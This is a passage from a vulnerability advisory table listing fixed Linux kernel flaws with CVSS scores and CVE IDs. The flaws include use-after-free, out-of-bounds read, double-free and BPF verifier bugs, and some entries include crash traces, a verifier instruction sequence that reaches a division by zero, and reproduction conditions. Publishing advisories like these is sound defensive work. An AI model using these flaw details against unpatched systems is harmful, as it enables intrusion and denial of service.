concurrent task must be able to release the pcpu_rt. Shared nexthop objects provide such a path, as two routes pointing to the same nhid share the same fib6_nh and its rt6i_pcpu entry. Fix seg6_input_core() and rpl_input() by calling skb_dst_force() after ip6_route_input() to force the NOREF dst into a refcounted one before caching. The output path is not affected as ip6_route_output() already returns a refcounted dst. | 2026-05-27 | 8.1 | CVE-2026-46099 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Fix shadow paging use-after-free due to unexpected GFN The shadow MMU computes GFNs for direct shadow pages using sp->gfn plus the SPTE index. This assumption breaks for shadow paging if the guest page tables are modified between VM entries (similar to commit aad885e77496, "KVM: x86/mmu: Drop/zap existing present SPTE even when creating an MMIO SPTE", 2026-03-27). The flow is as follows: - a PDE is installed for a 2MB mapping, and a page in that area is accessed. KVM creates a kvm_mmu_page consisting of 512 4KB pages; the kvm_mmu_page is marked by FNAME(fetch) as direct-mapped because the guest's mapping is a huge page (and thus contiguous). - the PDE mapping is changed from outside the guest. - the guest accesses another page in the same 2MB area. KVM installs a new leaf SPTE and rmap entry; the SPTE uses the "correct" GFN (i.e. based on the new mapping, as changed in the previous step) but that GFN is outside of the [sp->gfn, sp->gfn + 511] range; therefore the rmap entry cannot be found and removed when the kvm_mmu_page is zapped. - the memslot that covers the first 2MB mapping is deleted, and the kvm_mmu_page for the now-invalid GPA is zapped. However, rmap_remove() only looks at the [sp->gfn, sp->gfn + 511] range established in step 1, and fails to find the rmap entry that was recorded by step 3. - any operation that causes an rmap walk for the same page accessed by step 3 then walks a stale rmap and dereferences a freed kvm_mmu_page. This includes dirty logging or MMU notifier invalidations (e.g., from MADV_DONTNEED). The underlying issue is that KVM's walking of shadow PTEs assumes that if a SPTE is present when KVM wants to install a non-leaf SPTE, then the existing kvm_mmu_page must be for the correct gfn. Because the only way for the gfn to be wrong is if KVM messed up and failed to zap a SPTE... which shouldn't happen, but *actually* only happens in response to a guest write. That bug dates back literally forever, as even the first version of KVM assumes that the GFN matches and walks into the "wrong" shadow page. However, that was only an imprecision until 2032a93d66fa ("KVM: MMU: Don't allocate gfns page for direct mmu pages") came along. Fix it by checking for a target gfn mismatch and zapping the existing SPTE. That way the old SP and rmap entries are gone, KVM installs the rmap in the right location, and everyone is happy. | 2026-05-28 | 8.8 | CVE-2026-46113 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: remove station if connection prep fails If connection preparation fails for MLO connections, then the interface is completely reset to non-MLD. In this case, we must not keep the station since it's related to the link of the vif being removed. Delete an existing station. Any "new_sta" is already being removed, so that doesn't need changes. This fixes a use-after-free/double-free in debugfs if that's enabled, because a vif going from MLD (and to MLD, but that's not relevant here) recreates its entire debugfs. | 2026-05-28 | 8.8 | CVE-2026-46125 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_event: Fix OOB read and infinite loop in hci_le_create_big_complete_evt hci_le_create_big_complete_evt() iterates over BT_BOUND connections for a BIG handle using a while loop, accessing ev->bis_handle[i++] on each iteration. However, there is no check that i stays within ev->num_bis before the array access. When a controller sends a LE_Create_BIG_Complete event with fewer bis_handle entries than there are BT_BOUND connections for that BIG, or with num_bis=0, the loop reads beyond the valid bis_handle[] flex array into adjacent heap memory. Since the out-of-bounds values typically exceed HCI_CONN_HANDLE_MAX (0x0EFF), hci_conn_set_handle() rejects them and the connection remains in BT_BOUND state. The same connection is then found again by hci_conn_hash_lookup_big_state(), creating an infinite loop with hci_dev_lock held. Fix this by terminating the BIG if in case not all BIS could be setup properly. | 2026-05-28 | 8.1 | CVE-2026-46138 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: drop stray 'static' from fast-RX rx_result ieee80211_invoke_fast_rx() is documented as safe for parallel RX, but its per-invocation rx_result is declared static. Concurrent callers then share one instance and can overwrite each other's result between ieee80211_rx_mesh_data() and the switch on res. That can make a packet that was queued or consumed by ieee80211_rx_mesh_data() fall through into ieee80211_rx_8023(), or make a packet that should continue return as queued. Make res an automatic variable so each invocation keeps its own result. | 2026-05-28 | 8.8 | CVE-2026-46152 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: use safe list iteration in radar detect work The call to ieee80211_dfs_cac_cancel can cause the iterated chanctx to be freed and removed from the list. Guard against this to avoid a slab-use-after-free error. | 2026-05-28 | 8.8 | CVE-2026-46166 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/CPU/AMD: Prevent improper isolation of shared resources in Zen2's op cache Make sure resources are not improperly shared in the op cache and cause instruction corruption this way. | 2026-05-28 | 8.8 | CVE-2026-46174 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: fix integer overflow on buff_pos Fixing an integer overflow present in batadv_iv_ogm_send_to_if. The size check is done using the int type in batadv_iv_ogm_aggr_packet whereas the buff_pos variable uses the s16 type. This could lead to an out-of-bound read. | 2026-05-28 | 8.8 | CVE-2026-46198 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: bla: prevent use-after-free when deleting claims When batadv_bla_del_backbone_claims() removes all claims for a backbone, it does this by dropping the link entry in the hash list. This list entry itself was one of the references which need to be dropped at the same time via batadv_claim_put(). But the batadv_claim_put() must not be done before the last access to the claim object in this function. Otherwise the claim might be freed already by the batadv_claim_release() function before the list entry was dropped. | 2026-05-28 | 8.8 | CVE-2026-46212 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: playstation: Clamp num_touch_reports A device would never lie about the number of touch reports would it? If it does the loop in dualshock4_parse_report will read off the end of the touch_reports array, up to about 2 KiB for the maximum number of 256 loop iteraions. The data that is read is emitted via evdev if the DS4_TOUCH_POINT_INACTIVE bit happens to be set. Protect against this by clamping the num_touch_reports value provided by the device to the maximum size of the touch_reports array. | 2026-05-28 | 8.1 | CVE-2026-46232 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: stop caching unowned originator pointers in BAT IV BAT IV keeps the last-hop neighbor address in each neigh_node, but some paths also cache an originator pointer derived from a temporary lookup. That pointer is not owned by the neigh_node and may no longer refer to a live originator entry after purge handling runs. Stop storing the auxiliary originator pointer in the BAT IV neighbor state. When BAT IV needs the neighbor originator data, resolve it from the stored neighbor address and drop the reference again after use. [sven: avoid bonding logic for outgoing OGM] | 2026-05-28 | 8.8 | CVE-2026-46238 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix double free in rxe_srq_from_init In rxe_srq_from_init(), the queue pointer 'q' is assigned to 'srq->rq.queue' before copying the SRQ number to user space. If copy_to_user() fails, the function calls rxe_queue_cleanup() to free the queue, but leaves the now-invalid pointer in 'srq->rq.queue'. The caller of rxe_srq_from_init() (rxe_create_srq) eventually calls rxe_srq_cleanup() upon receiving the error, which triggers a second rxe_queue_cleanup() on the same memory, leading to a double free. The call trace looks like this: kmem_cache_free+0x.../0x... rxe_queue_cleanup+0x1a/0x30 [rdma_rxe] rxe_srq_cleanup+0x42/0x60 [rdma_rxe] rxe_elem_release+0x31/0x70 [rdma_rxe] rxe_create_srq+0x12b/0x1a0 [rdma_rxe] ib_create_srq_user+0x9a/0x150 [ib_core] Fix this by moving 'srq->rq.queue = q' after copy_to_user. | 2026-05-27 | 7.8 | CVE-2026-45852 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/uverbs: Validate wqe_size before using it in ib_uverbs_post_send ib_uverbs_post_send() uses cmd.wqe_size from userspace without any validation before passing it to kmalloc() and using the allocated buffer as struct ib_uverbs_send_wr. If a user provides a small wqe_size value (e.g., 1), kmalloc() will succeed, but subsequent accesses to user_wr->opcode, user_wr->num_sge, and other fields will read beyond the allocated buffer, resulting in an out-of-bounds read from kernel heap memory. This could potentially leak sensitive kernel information to userspace. Additionally, providing an excessively large wqe_size can trigger a WARNING in the memory allocation path, as reported by syzkaller. This is inconsistent with ib_uverbs_unmarshall_recv() which properly validates that wqe_size >= sizeof(struct ib_uverbs_recv_wr) before proceeding. Add the same validation for ib_uverbs_post_send() to ensure wqe_size is at least sizeof(struct ib_uverbs_send_wr). | 2026-05-27 | 7.1 | CVE-2026-45856 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_queue: do shared-unconfirmed check before segmentation Ulrich reports a regression with nfqueue: If an application did not set the 'F_GSO' capability flag and a gso packet with an unconfirmed nf_conn entry is received all packets are now dropped instead of queued, because the check happens after skb_gso_segment(). In that case, we did have exclusive ownership of the skb and its associated conntrack entry. The elevated use count is due to skb_clone happening via skb_gso_segment(). Move the check so that its peformed vs. the aggregated packet. Then, annotate the individual segments except the first one so we can do a 2nd check at reinject time. For the normal case, where userspace does in-order reinjects, this avoids packet drops: first reinjected segment continues traversal and confirms entry, remaining segments observe the confirmed entry. While at it, simplify nf_ct_drop_unconfirmed(): We only care about unconfirmed entries with a refcnt > 1, there is no need to special-case dying entries. This only happens with UDP. With TCP, the only unconfirmed packet will be the TCP SYN, those aren't aggregated by GRO. Next patch adds a udpgro test case to cover this scenario. | 2026-05-27 | 7.5 | CVE-2026-45859 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conncount: increase the connection clean up limit to 64 After the optimization to only perform one GC per jiffy, a new problem was introduced. If more than 8 new connections are tracked per jiffy the list won't be cleaned up fast enough possibly reaching the limit wrongly. In order to prevent this issue, only skip the GC if it was already triggered during the same jiffy and the increment is lower than the clean up limit. In addition, increase the clean up limit to 64 connections to avoid triggering GC too often and do more effective GCs. This has been tested using a HTTP server and several performance tools while having nft_connlimit/xt_connlimit or OVS limit configured. Output of slowhttptest + OVS limit at 52000 connections: slow HTTP test status on 340th second: initializing: 0 pending: 432 connected: 51998 error: 0 closed: 0 service available: YES | 2026-05-27 | 7.5 | CVE-2026-45860 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: Fix slab-use-after-free in qd_put Commit a475c5dd16e5 ("gfs2: Free quota data objects synchronously") started freeing quota data objects during filesystem shutdown instead of putting them back onto the LRU list, but it failed to remove these objects from the LRU list, causing LRU list corruption. This caused use-after-free when the shrinker (gfs2_qd_shrink_scan) tried to access already-freed objects on the LRU list. Fix this by removing qd objects from the LRU list before freeing them in qd_put(). Initial fix from Deepanshu Kartikey <kartikey406@gmail.com>. | 2026-05-27 | 7.8 | CVE-2026-45861 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Flush cache for PASID table before using it When writing the address of a freshly allocated zero-initialized PASID table to a PASID directory entry, do that after the CPU cache flush for this PASID table, not before it, to avoid the time window when this PASID table may be already used by non-coherent IOMMU hardware while its contents in RAM is still some random old data, not zero-initialized. | 2026-05-27 | 7.8 | CVE-2026-45862 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Fix watch_id bounds checking in debug address watch v2 The address watch clear code receives watch_id as an unsigned value (u32), but some helper functions were using a signed int and checked bits by shifting with watch_id. If a very large watch_id is passed from userspace, it can be converted to a negative value. This can cause invalid shifts and may access memory outside the watch_points array. drm/amdkfd: Fix watch_id bounds checking in debug address watch v2 Fix this by checking that watch_id is within MAX_WATCH_ADDRESSES before using it. Also use BIT(watch_id) to test and clear bits safely. This keeps the behavior unchanged for valid watch IDs and avoids undefined behavior for invalid ones. Fixes the below: drivers/gpu/drm/amd/amdgpu/../amdkfd/kfd_debug.c:448 kfd_dbg_trap_clear_dev_address_watch() error: buffer overflow 'pdd->watch_points' 4 <= u32max user_rl='0-3,2147483648-u32max' uncapped drivers/gpu/drm/amd/amdgpu/../amdkfd/kfd_debug.c 433 int kfd_dbg_trap_clear_dev_address_watch(struct kfd_process_device *pdd, 434 uint32_t watch_id) 435 { 436 int r; 437 438 if (!kfd_dbg_owns_dev_watch_id(pdd, watch_id)) kfd_dbg_owns_dev_watch_id() doesn't check for negative values so if watch_id is larger than INT_MAX it leads to a buffer overflow. (Negative shifts are undefined). 439 return -EINVAL; 440 441 if (!pdd->dev->kfd->shared_resources.enable_mes) { 442 r = debug_lock_and_unmap(pdd->dev->dqm); 443 if (r) 444 return r; 445 } 446 447 amdgpu_gfx_off_ctrl(pdd->dev->adev, false); --> 448 pdd->watch_points[watch_id] = pdd->dev->kfd2kgd->clear_address_watch( 449 pdd->dev->adev, 450 watch_id); v2: (as per, Jonathan Kim) - Add early watch_id >= MAX_WATCH_ADDRESSES validation in the set path to match the clear path. - Drop the redundant bounds check in kfd_dbg_owns_dev_watch_id(). | 2026-05-27 | 7.8 | CVE-2026-45878 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Clear Present bit before tearing down PASID entry The Intel VT-d Scalable Mode PASID table entry consists of 512 bits (64 bytes). When tearing down an entry, the current implementation zeros the entire 64-byte structure immediately using multiple 64-bit writes. Since the IOMMU hardware may fetch these 64 bytes using multiple internal transactions (e.g., four 128-bit bursts), updating or zeroing the entire entry while it is active (P=1) risks a "torn" read. If a hardware fetch occurs simultaneously with the CPU zeroing the entry, the hardware could observe an inconsistent state, leading to unpredictable behavior or spurious faults. Follow the "Guidance to Software for Invalidations" in the VT-d spec (Section 6.5.3.3) by implementing the recommended ownership handshake: 1. Clear only the 'Present' (P) bit of the PASID entry. 2. Use a dma_wmb() to ensure the cleared bit is visible to hardware before proceeding. 3. Execute the required invalidation sequence (PASID cache, IOTLB, and Device-TLB flush) to ensure the hardware has released all cached references. 4. Only after the flushes are complete, zero out the remaining fields of the PASID entry. Also, add a dma_wmb() in pasid_set_present() to ensure that all other fields of the PASID entry are visible to the hardware before the Present bit is set. | 2026-05-27 | 7.8 | CVE-2026-45894 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: mediatek: Drop __initconst from gates Since commit 8ceff24a754a ("clk: mediatek: clk-gate: Refactor mtk_clk_register_gate to use mtk_gate struct") the mtk_gate structs are no longer just used for initialization/registration, but also at runtime. So drop __initconst annotations. | 2026-05-27 | 7.8 | CVE-2026-45909 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix race condition in QP timer handlers I encontered the following warning: WARNING: drivers/infiniband/sw/rxe/rxe_task.c:249 at rxe_sched_task+0x1c8/0x238 [rdma_rxe], CPU#0: swapper/0/0 ... libsha1 [last unloaded: ip6_udp_tunnel] CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Tainted: G C 6.19.0-rc5-64k-v8+ #37 PREEMPT Tainted: [C]=CRAP Hardware name: Raspberry Pi 4 Model B Rev 1.2 Call trace: rxe_sched_task+0x1c8/0x238 [rdma_rxe] (P) retransmit_timer+0x130/0x188 [rdma_rxe] call_timer_fn+0x68/0x4d0 __run_timers+0x630/0x888 ... WARNING: drivers/infiniband/sw/rxe/rxe_task.c:38 at rxe_sched_task+0x1c0/0x238 [rdma_rxe], CPU#0: swapper/0/0 ... WARNING: drivers/infiniband/sw/rxe/rxe_task.c:111 at do_work+0x488/0x5c8 [rdma_rxe], CPU#3: kworker/u17:4/93400 ... refcount_t: underflow; use-after-free. WARNING: lib/refcount.c:28 at refcount_warn_saturate+0x138/0x1a0, CPU#3: kworker/u17:4/93400 The issue is caused by a race condition between retransmit_timer() and rxe_destroy_qp, leading to the Queue Pair's (QP) reference count dropping to zero during timer handler execution. It seems this warning is harmless because rxe_qp_do_cleanup() will flush all pending timers and requests. Example of flow causing the issue: CPU0 CPU1 retransmit_timer() { spin_lock_irqsave rxe_destroy_qp() __rxe_cleanup() __rxe_put() // qp->ref_count decrease to 0 rxe_qp_do_cleanup() { if (qp->valid) { rxe_sched_task() { WARN_ON(rxe_read(task->qp) <= 0); } } spin_unlock_irqrestore } spin_lock_irqsave qp->valid = 0 spin_unlock_irqrestore } Ensure the QP's reference count is maintained and its validity is checked within the timer callbacks by adding calls to rxe_get(qp) and corresponding rxe_put(qp) after use. | 2026-05-27 | 7.8 | CVE-2026-45910 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ovpn: fix possible use-after-free in ovpn_net_xmit When building the skb_list in ovpn_net_xmit, skb_share_check will free the original skb if it is shared. The current implementation continues to use the stale skb pointer for subsequent operations: - peer lookup, - skb_dst_drop (even though all segments produced by skb_gso_segment will have a dst attached), - ovpn_peer_stats_increment_tx. Fix this by moving the peer lookup and skb_dst_drop before segmentation so that the original skb is still valid when used. Return early if all segments fail skb_share_check and the list ends up empty. Also switch ovpn_peer_stats_increment_tx to use skb_list.next; the next patch fixes the stats logic. | 2026-05-27 | 7.8 | CVE-2026-45929 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Hold mm structure across iommu_sva_unbind_device() Some tests trigger a crash in iommu_sva_unbind_device() due to accessing iommu_mm after the associated mm structure has been freed. Fix this by taking an explicit reference to the mm structure after successfully binding the device, and releasing it only after the device is unbound. This ensures the mm remains valid for the entire SVA bind/unbind lifetime. | 2026-05-27 | 7.8 | CVE-2026-45931 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix tcx/netkit detach permissions when prog fd isn't given This commit fixes a security issue where BPF_PROG_DETACH on tcx or netkit devices could be executed by any user when no program fd was provided, bypassing permission checks. The fix adds a capability check for CAP_NET_ADMIN or CAP_SYS_ADMIN in this case. | 2026-05-27 | 7.3 | CVE-2026-45932 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Preserve id of register in sync_linked_regs() sync_linked_regs() copies the id of known_reg to reg when propagating bounds of known_reg to reg using the off of known_reg, but when known_reg was linked to reg like: known_reg = reg ; both known_reg and reg get same id known_reg += 4 ; known_reg gets off = 4, and its id gets BPF_ADD_CONST now when a call to sync_linked_regs() happens, let's say with the following: if known_reg >= 10 goto pc+2 known_reg's new bounds are propagated to reg but now reg gets BPF_ADD_CONST from the copy. This means if another link to reg is created like: another_reg = reg ; another_reg should get the id of reg but assign_scalar_id_before_mov() sees BPF_ADD_CONST on reg and assigns a new id to it. As reg has a new id now, known_reg's link to reg is broken. If we find new bounds for known_reg, they will not be propagated to reg. This can be seen in the selftest added in the next commit: 0: (85) call bpf_get_prandom_u32#7 ; R0=scalar() 1: (57) r0 &= 255 ; R0=scalar(smin=smin32=0,smax=umax=smax32=umax32=255,var_off=(0x0; 0xff)) 2: (bf) r1 = r0 ; R0=scalar(id=1,smin=smin32=0,smax=umax=smax32=umax32=255,var_off=(0x0; 0xff)) R1=scalar(id=1,smin=smin32=0,smax=umax=smax32=umax32=255,var_off=(0x0; 0xff)) 3: (07) r1 += 4 ; R1=scalar(id=1+4,smin=umin=smin32=umin32=4,smax=umax=smax32=umax32=259,var_off=(0x0; 0x1ff)) 4: (a5) if r1 < 0xa goto pc+4 ; R1=scalar(id=1+4,smin=umin=smin32=umin32=10,smax=umax=smax32=umax32=259,var_off=(0x0; 0x1ff)) 5: (bf) r2 = r0 ; R0=scalar(id=2,smin=umin=smin32=umin32=6,smax=umax=smax32=umax32=255) R2=scalar(id=2,smin=umin=smin32=umin32=6,smax=umax=smax32=umax32=255) 6: (a5) if r1 < 0xe goto pc+2 ; R1=scalar(id=1+4,smin=umin=smin32=umin32=14,smax=umax=smax32=umax32=259,var_off=(0x0; 0x1ff)) 7: (35) if r0 >= 0xa goto pc+1 ; R0=scalar(id=2,smin=umin=smin32=umin32=6,smax=umax=smax32=umax32=9,var_off=(0x0; 0xf)) 8: (37) r0 /= 0 div by zero When 4 is verified, r1's bounds are propagated to r0 but r0 also gets BPF_ADD_CONST (bug). When 5 is verified, r0 gets a new id (2) and its link with r1 is broken. After 6 we know r1 has bounds [14, 259] and therefore r0 should have bounds [10, 255], therefore the branch at 7 is always taken. But because r0's id was changed to 2, r1's new bounds are not propagated to r0. The verifier still thinks r0 has bounds [6, 255] before 7 and execution can reach div by zero. Fix this by preserving id in sync_linked_regs() like off and subreg_def. | 2026-05-27 | 7.8 | CVE-2026-45933 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix slab-out-of-bounds read in DeleteIndexEntryRoot In the 'DeleteIndexEntryRoot' case of the 'do_action' function, the entry size ('esize') is retrieved from the log record without adequate bounds checking. Specifically, the code calculates the end of the entry ('e2') using: e2 = Add2Ptr(e1, esize); It then calculates the size for memmove using 'PtrOffset(e2, ...)', which subtracts the end pointer from the buffer limit. If 'esize' is maliciously large, 'e2' exceeds the used buffer size. This results in a negative offset which, when cast to size_t for memmove, interprets as a massive unsigned integer, leading to a heap buffer overflow. This commit adds a check to ensure that the entry size ('esize') strictly fits within the remaining used space of the index header before performing memory operations. | 2026-05-27 | 7.8 | CVE-2026-45935 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix e4b bitmap inconsistency reports A bitmap inconsistency issue was observed during stress tests under mixed huge-page workloads. Ext4 reported multiple e4b bitmap check failures like: ext4_mb_complex_scan_group:2508: group 350, 8179 free clusters as per group info. But got 8192 blocks Analysis and experimentation confirmed that the issue is caused by a race condition between page migration and bitmap modification. Although this timing window is extremely narrow, it is still hit in practice: folio_lock ext4_mb_load_buddy __migrate_folio check ref count folio_mc_copy __filemap_get_folio folio_try_get(folio) ...... mb_mark_used ext4_mb_unload_buddy __folio_migrate_mapping folio_ref_freeze folio_unlock The root cause of this issue is that the fast path of load_buddy only increments the folio's reference count, which is insufficient to prevent concurrent folio migration. We observed that the folio migration process acquires the folio lock. Therefore, we can determine whether to take the fast path in load_buddy by checking the lock status. If the folio is locked, we opt for the slow path (which acquires the lock) to close this concurrency window. Additionally, this change addresses the following issues: When the DOUBLE_CHECK macro is enabled to inspect bitmap-related issues, the following error may be triggered: corruption in group 324 at byte 784(6272): f in copy != ff on disk/prealloc Analysis reveals that this is a false positive. There is a specific race window where the bitmap and the group descriptor become momentarily inconsistent, leading to this error report: ext4_mb_load_buddy ext4_mb_load_buddy __filemap_get_folio(create|lock) folio_lock ext4_mb_init_cache folio_mark_uptodate __filemap_get_folio(no lock) ...... mb_mark_used mb_mark_used_double mb_cmp_bitmaps mb_set_bits(e4b->bd_bitmap) folio_unlock The original logic assumed that since mb_cmp_bitmaps is called when the bitmap is newly loaded from disk, the folio lock would be sufficient to prevent concurrent access. However, this overlooks a specific race condition: if another process attempts to load buddy and finds the folio is already in an uptodate state, it will immediately begin using it without holding folio lock. | 2026-05-27 | 7.8 | CVE-2026-45942 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Clear Present bit before tearing down context entry When tearing down a context entry, the current implementation zeros the entire 128-bit entry using multiple 64-bit writes. This creates a window where the hardware can fetch a "torn" entry - where some fields are already zeroed while the 'Present' bit is still set - leading to unpredictable behavior or spurious faults. While x86 provides strong write ordering, the compiler may reorder writes to the two 64-bit halves of the context entry. Even without compiler reordering, the hardware fetch is not guaranteed to be atomic with respect to multiple CPU writes. Align with the "Guidance to Software for Invalidations" in the VT-d spec (Section 6.5.3.3) by implementing the recommended ownership handshake: 1. Clear only the 'Present' (P) bit of the context entry first to signal the transition of ownership from hardware to software. 2. Use dma_wmb() to ensure the cleared bit is visible to the IOMMU. 3. Perform the required cache and context-cache invalidation to ensure hardware no longer has cached references to the entry. 4. Fully zero out the entry only after the invalidation is complete. Also, add a dma_wmb() to context_set_present() to ensure the entry is fully initialized before the 'Present' bit becomes visible. | 2026-05-27 | 7.5 | CVE-2026-45944 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix a potential use-after-free of BTF object Refcounting in the check_pseudo_btf_id() function is incorrect: the __check_pseudo_btf_id() function might get called with a zero refcounted btf. Fix this, and patch related code accordingly. v3: rephrase a comment (AI) v2: fix a refcount leak introduced in v1 (AI) | 2026-05-27 | 7.8 | CVE-2026-45951 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/exynos: vidi: fix to avoid directly dereferencing user pointer In vidi_connection_ioctl(), vidi->edid(user pointer) is directly dereferenced in the kernel. This allows arbitrary kernel memory access from the user space, so instead of directly accessing the user pointer in the kernel, we should modify it to copy edid to kernel memory using copy_from_user() and use it. | 2026-05-27 | 7.1 | CVE-2026-45958 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: ccp - Fix a crash due to incorrect cleanup usage of kfree Annotating a local pointer variable, which will be assigned with the kmalloc-family functions, with the `__cleanup(kfree)` attribute will make the address of the local variable, rather than the address returned by kmalloc, passed to kfree directly and lead to a crash due to invalid deallocation of stack address. According to other places in the repo, the correct usage should be `__free(kfree)`. The code coincidentally compiled because the parameter type `void *` of kfree is compatible with the desired type `struct { ... } **`. | 2026-05-27 | 7.8 | CVE-2026-45959 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bonding: alb: fix UAF in rlb_arp_recv during bond up/down The ALB RX path may access rx_hashtbl concurrently with bond teardown. During rapid bond up/down cycles, rlb_deinitialize() frees rx_hashtbl while RX handlers are still running, leading to a null pointer dereference detected by KASAN. However, the root cause is that rlb_arp_recv() can still be accessed after setting recv_probe to NULL, which is actually a use-after-free (UAF) issue. That is the reason for using the referenced commit in the Fixes tag. [ 214.174138] Oops: general protection fault, probably for non-canonical address 0xdffffc000000001d: 0000 [#1] SMP KASAN PTI [ 214.186478] KASAN: null-ptr-deref in range [0x00000000000000e8-0x00000000000000ef] [ 214.194933] CPU: 30 UID: 0 PID: 2375 Comm: ping Kdump: loaded Not tainted 6.19.0-rc8+ #2 PREEMPT(voluntary) [ 214.205907] Hardware name: Dell Inc. PowerEdge R730/0WCJNT, BIOS 2.14.0 01/14/2022 [ 214.214357] RIP: 0010:rlb_arp_recv+0x505/0xab0 [bonding] [ 214.220320] Code: 0f 85 2b 05 00 00 48 b8 00 00 00 00 00 fc ff df 40 0f b6 ed 48 c1 e5 06 49 03 ad 78 01 00 00 48 8d 7d 28 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 06 0f 8e 12 05 00 00 80 7d 28 00 0f 84 8c 00 [ 214.241280] RSP: 0018:ffffc900073d8870 EFLAGS: 00010206 [ 214.247116] RAX: dffffc0000000000 RBX: ffff888168556822 RCX: ffff88816855681e [ 214.255082] RDX: 000000000000001d RSI: dffffc0000000000 RDI: 00000000000000e8 [ 214.263048] RBP: 00000000000000c0 R08: 0000000000000002 R09: ffffed11192021c8 [ 214.271013] R10: ffff8888c9010e43 R11: 0000000000000001 R12: 1ffff92000e7b119 [ 214.278978] R13: ffff8888c9010e00 R14: ffff888168556822 R15: ffff888168556810 [ 214.286943] FS: 00007f85d2d9cb80(0000) GS:ffff88886ccb3000(0000) knlGS:0000000000000000 [ 214.295966] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 214.302380] CR2: 00007f0d047b5e34 CR3: 00000008a1c2e002 CR4: 00000000001726f0 [ 214.310347] Call Trace: [ 214.313070] <IRQ> [ 214.315318] ? __pfx_rlb_arp_recv+0x10/0x10 [bonding] [ 214.320975] bond_handle_frame+0x166/0xb60 [bonding] [ 214.326537] ? __pfx_bond_handle_frame+0x10/0x10 [bonding] [ 214.332680] __netif_receive_skb_core.constprop.0+0x576/0x2710 [ 214.339199] ? __pfx_arp_process+0x10/0x10 [ 214.343775] ? sched_balance_find_src_group+0x98/0x630 [ 214.349513] ? __pfx___netif_receive_skb_core.constprop.0+0x10/0x10 [ 214.356513] ? arp_rcv+0x307/0x690 [ 214.360311] ? __pfx_arp_rcv+0x10/0x10 [ 214.364499] ? __lock_acquire+0x58c/0xbd0 [ 214.368975] __netif_receive_skb_one_core+0xae/0x1b0 [ 214.374518] ? __pfx___netif_receive_skb_one_core+0x10/0x10 [ 214.380743] ? lock_acquire+0x10b/0x140 [ 214.385026] process_backlog+0x3f1/0x13a0 [ 214.389502] ? process_backlog+0x3aa/0x13a0 [ 214.394174] __napi_poll.constprop.0+0x9f/0x370 [ 214.399233] net_rx_action+0x8c1/0xe60 [ 214.403423] ? __pfx_net_rx_action+0x10/0x10 [ 214.408193] ? lock_acquire.part.0+0xbd/0x260 [ 214.413058] ? sched_clock_cpu+0x6c/0x540 [ 214.417540] ? mark_held_locks+0x40/0x70 [ 214.421920] handle_softirqs+0x1fd/0x860 [ 214.426302] ? __pfx_handle_softirqs+0x10/0x10 [ 214.431264] ? __neigh_event_send+0x2d6/0xf50 [ 214.436131] do_softirq+0xb1/0xf0 [ 214.439830] </IRQ> The issue is reproducible by repeatedly running ip link set bond0 up/down while receiving ARP messages, where rlb_arp_recv() can race with rlb_deinitialize() and dereference a freed rx_hashtbl entry. Fix this by setting recv_probe to NULL and then calling synchronize_net() to wait for any concurrent RX processing to finish. This ensures that no RX handler can access rx_hashtbl after it is freed in bond_alb_deinitialize(). | 2026-05-27 | 7.8 | CVE-2026-45970 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Stop job scheduling across aie2_release_resource() Running jobs on a hardware context while it is in the process of releasing resources can lead to use-after-free and crashes. Fix this by stopping job scheduling before calling aie2_release_resource() and restarting it after the release completes. Additionally, aie2_sched_job_run() now checks whether the hardware context is still active. | 2026-05-27 | 7.8 | CVE-2026-45980 |
